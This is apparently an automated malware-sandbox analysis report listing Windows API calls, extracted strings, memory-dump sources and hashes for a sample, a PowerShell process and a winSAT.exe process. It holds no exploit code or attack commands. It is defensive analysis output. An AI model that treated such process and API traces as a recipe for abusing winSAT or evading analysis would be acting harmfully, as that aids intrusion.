                                                                                                                                                                                              • API String ID: 3712363035-66219284
                                                                                                                                                                                              • Opcode ID: 63fdd641d1b9510881a379fce0cbff5cab58f1c092c5a17148380fd449a2e826
                                                                                                                                                                                              • Instruction ID: 30392a530fa928b09b8412afc6dc4f2cd20664ca8a9f97139eafb5a2ce14b88a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 63fdd641d1b9510881a379fce0cbff5cab58f1c092c5a17148380fd449a2e826
                                                                                                                                                                                              • Instruction Fuzzy Hash: 33E09AB5540609BFEB009B64DD05F7B77ACEB04708F508565BD51F2150EB749C148A79
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
                                                                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                                                              • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                                                              • Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000010.00000002.2264575384.00007FFD9B420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B420000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_7ffd9b420000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: i
                                                                                                                                                                                              • API String ID: 0-3865851505
                                                                                                                                                                                              • Opcode ID: f2ec08adaf645420088b5964b7397e0678089a787921d461f129d8d52c328adf
                                                                                                                                                                                              • Instruction ID: cd7a7ded9101186660155da3b67365d23bde0c08c2fa4c2b60b456dd7acca9b4
                                                                                                                                                                                              • Opcode Fuzzy Hash: f2ec08adaf645420088b5964b7397e0678089a787921d461f129d8d52c328adf
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D624722B0FACA0FEBAA97A848715747BE1EF56614B1901FFC059C72E3ED18AC45D341
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000010.00000002.2264575384.00007FFD9B420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B420000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_7ffd9b420000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 9a3fcbaea475a1f5c940d659d976067597289109269a291cad5e4b8ba473f7cc
                                                                                                                                                                                              • Instruction ID: 633782b81481c879790ea86dff5f4c3990df1ac249e737f977082e180b9b8a91
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a3fcbaea475a1f5c940d659d976067597289109269a291cad5e4b8ba473f7cc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6851D07190D7C84FD756DB6898666A47FF1EF87314F0942DFE089C70A3C664641AC782
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000010.00000002.2264131219.00007FFD9B350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B350000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_7ffd9b350000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                              • Instruction ID: b0a576c083b0e6f9b3a34d123d02c6057c3a49e7cf838ce5d38a81e36f247068
                                                                                                                                                                                              • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                              • Instruction Fuzzy Hash: D401A73021CB0C4FD748EF4CE051AA5B7E0FF85320F10056DE58AC36A1DA36E882CB41
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$CriticalResourceSection$EnterLeaveModule$ErrorFileFindHandleLastLoadLockNameSizeofvswprintf_s
                                                                                                                                                                                              • String ID: base\winsat\exe\WinSATOp.h$cannot find the resource$cannot get the resource size$cannot load the resource's size$cannot lock the resource in memory$canot laod string$resource string is zero zero length (invalid)$string reosurce is not null terminated$target string too small to load resource
                                                                                                                                                                                              • API String ID: 85048269-1477483317
                                                                                                                                                                                              • Opcode ID: 86203d874c95be50812b680078b9e2188098a7dc5f572935665761bdd8c0efb9
                                                                                                                                                                                              • Instruction ID: 80473cec346462881a99975a872c29042306b15627fe62931ca56429ea073b3e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 86203d874c95be50812b680078b9e2188098a7dc5f572935665761bdd8c0efb9
                                                                                                                                                                                              • Instruction Fuzzy Hash: B202A066A18A5786EB00EB11E8144BDF761FB89B84FE48031DE4E43BA4DF7CE546C760
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$AddressErrorLastProc$LibraryLoad__uncaught_exception
                                                                                                                                                                                              • String ID: ... leaving it on$... turnning DWM off$> DWM Running.$> DWM not running$> DWM not running.$> DWM running$> leaving DWM on.$> turning off DWM.$DwmEnableComposition$DwmIsCompositionEnabled$DwmpRestartComposition$base\winsat\exe\main.cpp$dwmapi.dll
                                                                                                                                                                                              • API String ID: 3480005739-3538918301
                                                                                                                                                                                              • Opcode ID: eccd2e5c746716fad5d7c8b25d760ee242fe97af7fc28cd88510264bff17a53f
                                                                                                                                                                                              • Instruction ID: 856165624daf525d1552d5ee545727e9c71b335d919e7527919de2d3de7993d3
                                                                                                                                                                                              • Opcode Fuzzy Hash: eccd2e5c746716fad5d7c8b25d760ee242fe97af7fc28cd88510264bff17a53f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 46819B61E0D68396FB04BF15E8902B8ABA1FF45754FF49435D90E066A4DFBCE844C720
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Thread$Current$Priority$PerformanceQuery$ClassCounterProcess$AffinityMask$ErrorFrequencyLastSleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1607561639-0
                                                                                                                                                                                              • Opcode ID: 7b69ec100b1cf1692b8481da67ed15e1dbc6add3be9eea2e672f9ba1b56277f1
                                                                                                                                                                                              • Instruction ID: 66d511e059c0e1055e4e54cbdb8ac9ef2958d474486771c0b390511371a54f8f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b69ec100b1cf1692b8481da67ed15e1dbc6add3be9eea2e672f9ba1b56277f1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FC16D76B19B45CBEB00AF60D8142BCB762FB49B99FA48135CE0E0B798DF38A445C710
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Error$Last$EnabledEvent$AddressCloseControlCountCurrentDeviceFileLibraryLoadProcProcessStatusTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > Composition restarted$> Composition restarted$> Not necessary to reenable EMD cache.$> Successfully reenabled EMD.$> Unable to reenable EMD device; %s$CKCLStart$ERROR: Could not disable cache hits: %x$INFO: DwmpRestartComposition() did not return OK!$Restore system policies$Warning: Composition Restart not supported$Warning: Composition Restart not supported$base\winsat\exe\main.cpp$dwmapi.dll
                                                                                                                                                                                              • API String ID: 1785720630-3405197771
                                                                                                                                                                                              • Opcode ID: 9af75d1257538d4edd4ffe61fe718f874191034c87eb8f32d107f12ce79722e6
                                                                                                                                                                                              • Instruction ID: 0af5434132e4972eed174ed68b071fc57920e10b0e06670fbbbe0929c01a6be6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9af75d1257538d4edd4ffe61fe718f874191034c87eb8f32d107f12ce79722e6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F612220A0CA8382FB10BB51A8153B9AB60BF85754FF49036C94E466E5DFBCF448CB61
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.MSVCRT(?,?,?,00000000,00000000,00000400,00000080,?,00007FF780FD9509), ref: 00007FF780FD68FA
                                                                                                                                                                                              • memset.MSVCRT(?,?,?,00000000,00000000,00000400,00000080,?,00007FF780FD9509), ref: 00007FF780FD690B
                                                                                                                                                                                              • memset.MSVCRT(?,?,?,00000000,00000000,00000400,00000080,?,00007FF780FD9509), ref: 00007FF780FD691C
                                                                                                                                                                                              • memset.MSVCRT(?,?,?,00000000,00000000,00000400,00000080,?,00007FF780FD9509), ref: 00007FF780FD6940
                                                                                                                                                                                                • Part of subcall function 00007FF78100B900: GetModuleHandleW.KERNEL32 ref: 00007FF78100B949
                                                                                                                                                                                                • Part of subcall function 00007FF78100B900: GetTickCount.KERNEL32 ref: 00007FF78100B9B9
                                                                                                                                                                                                • Part of subcall function 00007FF78100B900: LoadLibraryW.KERNEL32 ref: 00007FF78100BA10
                                                                                                                                                                                                • Part of subcall function 00007FF78100B900: GetLastError.KERNEL32 ref: 00007FF78100BA28
                                                                                                                                                                                              • SetupDiDestroyDeviceInfoList.SETUPAPI ref: 00007FF780FD6CEF
                                                                                                                                                                                              • SetLastError.KERNEL32 ref: 00007FF780FD6D01
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memset$ErrorLast$CountDestroyDeviceHandleInfoLibraryListLoadModuleSetupTick
                                                                                                                                                                                              • String ID: Index [%d]: PNPID = %S$Matching device PnPID is %S$PNPID from DX9 call = %S$base\winsat\common\winsatutilities.cpp
                                                                                                                                                                                              • API String ID: 4086297632-3351476903
                                                                                                                                                                                              • Opcode ID: 86958b7cdd69083b66b4547d905b583323dc14dbf35370d738db5a6c2fc742ab
                                                                                                                                                                                              • Instruction ID: 6fd06364e88d3bace0f28ab460bff4646beb6d8e1289b0a6ece0a8144ab5cbb4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 86958b7cdd69083b66b4547d905b583323dc14dbf35370d738db5a6c2fc742ab
                                                                                                                                                                                              • Instruction Fuzzy Hash: 49D18432A08B8289E720EF21DC403F9B364FB85758FA08231EA5D47B99DF78E645C710
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __uncaught_exception$AddressCountProcTick$ErrorHandleLastLibraryLoadModuleSleep
                                                                                                                                                                                              • String ID: D3DCommon::DX9Init$Direct3DCreate9$Direct3DCreate9Ex$Failed querying interface.$base\winsat\d3d\dx9base.cpp$d3d9.dll
                                                                                                                                                                                              • API String ID: 2352445144-745675029
                                                                                                                                                                                              • Opcode ID: 21c5a692845b6f80f21a1e62387020077775f25eb3d32d9e9cc7a2f2045c2878
                                                                                                                                                                                              • Instruction ID: 5a116c8788795e16b88fc3988f01f47c1269e4c87a2f198255e8430a2cc2e4b4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 21c5a692845b6f80f21a1e62387020077775f25eb3d32d9e9cc7a2f2045c2878
                                                                                                                                                                                              • Instruction Fuzzy Hash: D0513925E09B4282EB50AB15EC44178F7A0FF49B51FF45636DA4E823A4DFBCE845CB60
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnabledEventTime$CountCurrentExceptionFileProcessSystemThrowTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: ERROR: Schema Validation of the formal assessment failed.$ERROR: %#08X DataStore::BuildFormalFromMostRecentPartialAssessments failed.$ERROR: %#08X DataStore::WriteAllPartialAssessments failed.$ERROR: %#08X GetWinSATDocumentWithCurrentConfig failed.$ERROR: %#08X DataStore::SaveFormalData failed.$HistoryVersionRead$HistoryVersionWrite$Skipping update to the TimeLastFormalAssessment in the registry - AXE mode$TimeLastFormalAssessment$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 3073564763-3073826658
                                                                                                                                                                                              • Opcode ID: 35efbdd0e4f3ab95cfe2b41bdf34785f45e86456031fc247f7ac3c80208a8cfb
                                                                                                                                                                                              • Instruction ID: d93c61397bcfd803004874b811c27787013b8002e7e83c34e586acb82edd3132
                                                                                                                                                                                              • Opcode Fuzzy Hash: 35efbdd0e4f3ab95cfe2b41bdf34785f45e86456031fc247f7ac3c80208a8cfb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 65613822A0C64396FB10BB21E8502B9A761BF547A8FF48132D90E477E6DFADF445C760
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorFileStatus$ControlDeviceInitOpenStringUnicode
                                                                                                                                                                                              • String ID: $0$@$ERROR: Could not disable cache hits: %x$ERROR: Could not open control handle: %x$\Device\RdyBoost$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1057317450-2235504267
                                                                                                                                                                                              • Opcode ID: 6a775b24524537a582d2429a4be7d5ab1ca4456a7b2a7e22435c35b6fea3d642
                                                                                                                                                                                              • Instruction ID: 64c22dab03971f70b69f8fc07da029d1f881b40ecaa5b8da4e99bc23aab307a5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a775b24524537a582d2429a4be7d5ab1ca4456a7b2a7e22435c35b6fea3d642
                                                                                                                                                                                              • Instruction Fuzzy Hash: AE214A32B18B52DAF700AB60E8443B8B764FB88718FA08635DA4D46795DFBCE158C754
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Local$Free$AllocCreateDescriptorKnownSecurityWell$DaclEntriesInitializememset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2625181342-0
                                                                                                                                                                                              • Opcode ID: 20c4f20feb80b6b69f46b80f1fca39230e041d6174e02534d753e8ff7984ab1e
                                                                                                                                                                                              • Instruction ID: d1046150643b39ecfe9ceaa4a4896a9180dd3b223e442408b798ec3cc3babf96
                                                                                                                                                                                              • Opcode Fuzzy Hash: 20c4f20feb80b6b69f46b80f1fca39230e041d6174e02534d753e8ff7984ab1e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B517C36A14A418BE754DF61E8043BDBBB0FB49B99FA58139DE0943B88DF78E404CB50
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$CloseFile$FindHandle$CreateFirstRead
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 308217017-0
                                                                                                                                                                                              • Opcode ID: cec97ef7f6fd6b090083ccbde30f4d0df262ed20abc2832fa241464f729a5b25
                                                                                                                                                                                              • Instruction ID: 7ce7d5f37ecaddd435d4403b806046854b7076f2367a73fac544d53071ab5b3f
                                                                                                                                                                                              • Opcode Fuzzy Hash: cec97ef7f6fd6b090083ccbde30f4d0df262ed20abc2832fa241464f729a5b25
                                                                                                                                                                                              • Instruction Fuzzy Hash: 06414135A0CA42C6E750AB11E84537DBB60FB89BA4FA49630DA5E037D4CF7CE445CB50
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorExceptionFormatFreeHandleLastLocalMessageModuleThrowmemcpy
                                                                                                                                                                                              • String ID: ERROR: Can't load help text:
                                                                                                                                                                                              • API String ID: 1131719323-2132811999
                                                                                                                                                                                              • Opcode ID: 08dd0f6236ebd114b85014350d989b4c5b833746dd6e7120f43029f0b01a69db
                                                                                                                                                                                              • Instruction ID: 2d5f988df4e78d2d6610d7c258d60344b13089f42af588b9532782e4def2708d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 08dd0f6236ebd114b85014350d989b4c5b833746dd6e7120f43029f0b01a69db
                                                                                                                                                                                              • Instruction Fuzzy Hash: 35316C32B0DB4286EB54AB55E4502BAF7A0FB85B90FE49235DA4E07794DF7CE005CB20
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __uncaught_exception$CountTick$FreeHandleLibraryModuleSleep
                                                                                                                                                                                              • String ID: D3DCommon::DX9Shutdown
                                                                                                                                                                                              • API String ID: 3610941158-2577756890
                                                                                                                                                                                              • Opcode ID: cd8845a20336be1aa6f0397a75ad1ef2358986b1d34ab775adc933cd83eb90d0
                                                                                                                                                                                              • Instruction ID: e6b48d547cf746d6abcafe54e9b53cae1480dd006477cfcfc0a8b299e2850b5e
                                                                                                                                                                                              • Opcode Fuzzy Hash: cd8845a20336be1aa6f0397a75ad1ef2358986b1d34ab775adc933cd83eb90d0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F415C35E09A0286EB51BB15EC40179B7A0FF85B60FA44636DA5E433A4CFBCE951CB60
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780F9EDEA), ref: 00007FF780FD7449
